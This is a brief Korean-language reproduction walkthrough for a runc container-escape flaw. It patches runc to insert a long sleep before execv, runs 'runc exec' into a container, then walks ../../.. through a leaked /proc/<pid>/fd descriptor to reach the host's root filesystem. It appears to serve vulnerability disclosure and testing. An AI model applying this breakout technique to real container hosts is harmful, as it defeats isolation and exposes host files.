reproduction step described at here
$ cd $GOPATH/src/github.com
$ git clone https://github.com/opencontainers/runc opencontainers/runc
$ git fetch origin 2cc5a91249ab3b362f1235da955d112017979d34
$ git checkout origin 2cc5a91249ab3b362f1235da955d112017979d34
$ vi $GOPATH/src/github.com/opencontainers/runc/libcontainer/setns_init_linux.go
아래 2개 line을 수정한다.
package libcontainer
import (
"fmt"
"os"
"github.com/opencontainers/runc/libcontainer/apparmor"
"github.com/opencontainers/runc/libcontainer/keys"
"github.com/opencontainers/runc/libcontainer/label"
"github.com/opencontainers/runc/libcontainer/seccomp"
"github.com/opencontainers/runc/libcontainer/system"
+ "time"
)
if err := label.SetProcessLabel(l.config.ProcessLabel); err != nil {
return err
}
+ time.Sleep(500 * time.Second)
return system.Execv(l.config.Args[0], l.config.Args[0:], os.Environ())
}
container를 생성한다.
sh1$ docker pull alpine
sh1$ docker create --name alpine alpine
sh1$ mkdir rootfs
sh1$ docker export alpine | tar xvfC - rootfs/
sh1$ runc spec
sh1$ runc run ctr
terminal을 새로 열고 container 내부에 process를 생성한다.
sh2$ runc exec ctr sh
여기서 500 초가량 block된다. 다시 첫번째 terimnal로 돌아간다.
sh1$ ps aux
sh1$ ls /proc/18/fd -la
sh1$ ls -la /proc/18/fd/4/../../..
위와 같은 방식으로 Host의 rootfs에 접근이 가능하다.